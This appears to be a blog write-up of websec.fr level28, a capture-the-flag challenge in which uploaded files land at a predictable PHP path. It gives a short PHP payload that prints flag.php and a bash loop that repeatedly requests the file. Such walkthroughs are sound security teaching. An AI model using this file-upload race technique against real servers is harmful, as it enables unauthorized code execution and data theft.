websec.fr level28

At first glance, level28 is a file storage service which lets us upload arbitrary files. Filenames are generated as such:

$filename = md5($_SERVER['REMOTE_ADDR']) . '.php';

We can't do anything like rewrite arbitrary files, but we do know where the file will be stored as $_SERVER['REMOTE_ADDR'] stores the requesting IP.

The main body of the challenge checks if the uploaded file matches the md5 of flag.php, that that $_POST['checksum'] equals the crc32 of $_POST['checksum']:

  file_put_contents($filename, $flagfilecontent);
  if (md5_file($filename) === md5_file('flag.php') && $_POST['checksum'] == crc32($_POST['checksum'])) {
    include($filename);  // it contains the `$flag` variable
    } else {
        $flag = "Nope, $filename is not the right file, sorry.";
        sleep(1);  // Deter bruteforce
    }

If we were able to do that, we'd basically already have flag.php, and hence the flag. However, what we can do instead is upload a PHP file which grabs flag.php. We know where the file will be written to, and we know that the file will be persisted to disk.

Payload:

<?php
    echo file_get_contents("flag.php");

Bruteforce script:

#!/bin/bash

while true; do
    curl -s http://websec.fr/level28/41f2cfda553d525dd41ac414456dbe25.php
done
Show Comments

Get the latest posts delivered right to your inbox.